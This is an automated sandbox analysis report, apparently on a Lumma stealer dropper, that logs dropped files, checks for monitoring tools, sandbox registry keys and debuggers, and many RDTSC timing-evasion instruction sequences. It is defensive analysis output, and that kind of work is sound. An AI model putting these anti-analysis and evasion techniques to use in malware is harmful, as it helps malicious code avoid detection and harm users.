Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA0F0 push FFFFFFCFh; iretd	2_3_014CA0F2
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014C810A push ecx; retf	2_3_014C8129
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA0F0 push FFFFFFCFh; iretd	2_3_014CA0F2
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014C810A push ecx; retf	2_3_014C8129

Source: YrxiR3yCLm.exe

Static PE information: section name: tmjadsgk entropy: 7.954441008809738

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: YrxiR3yCLm.exe	Binary or memory string: SBIEDLL.DLL
Source: YrxiR3yCLm.exe, 00000000.00000002.1753537825.00000000006E2000.00000040.00000001.01000000.00000003.sdmp, YrxiR3yCLm.exe, 00000000.00000003.1711393413.00000000055B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: DBE165 second address: DBE169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: DBE169 second address: DBE16F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: DBE16F second address: DBE174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F436DA second address: F436ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F1174CFE2BAh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F42D63 second address: F42D8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jo 00007F11753296A6h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F11753296B4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F42D8B second address: F42DA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F42F17 second address: F42F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F455F0 second address: F455F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F455F4 second address: F45603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45603 second address: F45669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F1174CFE2B8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3591h] 0x0000002a push 00000000h 0x0000002c mov edi, dword ptr [ebp+122D3761h] 0x00000032 push CC76DB80h 0x00000037 push eax 0x00000038 push edx 0x00000039 jnp 00007F1174CFE2CFh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45669 second address: F456B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 33892500h 0x00000010 mov edi, dword ptr [ebp+122D3725h] 0x00000016 push 00000003h 0x00000018 mov dx, 7E1Ah 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2880h], ebx 0x00000024 push 00000003h 0x00000026 mov edx, dword ptr [ebp+122D36DDh] 0x0000002c add dword ptr [ebp+122D1B57h], esi 0x00000032 call 00007F11753296A9h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F456B3 second address: F456B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F456B7 second address: F456C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11753296A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F456C1 second address: F456E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1174CFE2BAh 0x00000008 jmp 00007F1174CFE2BCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F1174CFE2B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F456E7 second address: F45705 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F11753296B0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45705 second address: F45713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45713 second address: F45717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45717 second address: F4571B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F457B2 second address: F457B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F457B8 second address: F457DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124589F6h], ecx 0x0000000d mov cx, 17D2h 0x00000011 push 00000000h 0x00000013 mov cl, 2Ch 0x00000015 add dword ptr [ebp+122D1B1Bh], ecx 0x0000001b push D83CE788h 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F457DD second address: F457E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F457E1 second address: F4580F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 27C318F8h 0x0000000e mov dword ptr [ebp+122D1F34h], edi 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 mov esi, edx 0x0000001a push 00000003h 0x0000001c adc cl, FFFFFFBAh 0x0000001f push A7E17E6Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 jl 00007F1174CFE2B6h 0x0000002d pop esi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F4580F second address: F45816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45816 second address: F45853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 181E8192h 0x0000000e call 00007F1174CFE2BEh 0x00000013 mov dword ptr [ebp+122D1C00h], ebx 0x00000019 pop ecx 0x0000001a lea ebx, dword ptr [ebp+1245B4F4h] 0x00000020 add ecx, dword ptr [ebp+122D3645h] 0x00000026 xchg eax, ebx 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F1174CFE2BAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F458FB second address: F4591B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F11753296B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F4591B second address: F4596E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1174CFE2C9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 jmp 00007F1174CFE2C3h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F1174CFE2BFh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F4596E second address: F45974 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F45974 second address: F4597A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F4597A second address: F4597E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F66BF9 second address: F66C03 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1174CFE2BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F64B91 second address: F64BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F11753296A6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jmp 00007F11753296B7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F64CF1 second address: F64D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1174CFE2BFh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F64D09 second address: F64D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F64FB7 second address: F64FBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F64FBD second address: F64FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F11753296ACh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F11753296B8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F6516F second address: F65175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F65175 second address: F65179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F6534A second address: F65350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F65350 second address: F6535B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F11753296A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F6535B second address: F65373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F1174CFE2B6h 0x00000009 jns 00007F1174CFE2B6h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F1174CFE2B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F659A2 second address: F659A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F659A8 second address: F659AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F659AF second address: F659B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F5AFF7 second address: F5B033 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1174CFE2BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F1174CFE2C9h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F1174CFE2B6h 0x0000001a je 00007F1174CFE2B6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F5B033 second address: F5B056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F5B056 second address: F5B076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1174CFE2BBh 0x00000009 pop edx 0x0000000a pushad 0x0000000b jbe 00007F1174CFE2B6h 0x00000011 ja 00007F1174CFE2B6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F663FA second address: F66400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F66400 second address: F6640C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1174CFE2B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F6640C second address: F66460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11753296B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F11753296B0h 0x00000010 jo 00007F11753296A6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007F11753296B8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F66460 second address: F66466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F66466 second address: F66482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F11753296A6h 0x0000000e jmp 00007F11753296AEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F66715 second address: F6671F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1174CFE2C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F6CC93 second address: F6CCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11753296B8h 0x00000009 popad 0x0000000a js 00007F11753296B8h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F11753296B0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F3D6CD second address: F3D6EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C9h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F70C85 second address: F70C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F70F8A second address: F70FBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F1174CFE2C8h 0x00000012 jng 00007F1174CFE2B6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F70FBA second address: F70FBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F71415 second address: F7141F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F7141F second address: F71425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F71425 second address: F71430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F71703 second address: F71707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F73AFC second address: F73B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F73B00 second address: F73B0B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F3A275 second address: F3A292 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1174CFE2B6h 0x00000008 jmp 00007F1174CFE2C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75C9E second address: F75CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11753296B5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75CB7 second address: F75CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: F75CBB second address: F75CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
